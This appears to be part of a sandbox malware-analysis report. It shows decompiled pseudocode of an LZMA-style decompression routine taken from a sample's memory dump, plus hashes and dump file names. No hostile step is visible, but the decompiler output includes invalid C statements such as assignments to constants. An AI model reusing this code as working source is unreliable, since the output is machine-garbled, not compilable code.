								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004062EB Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
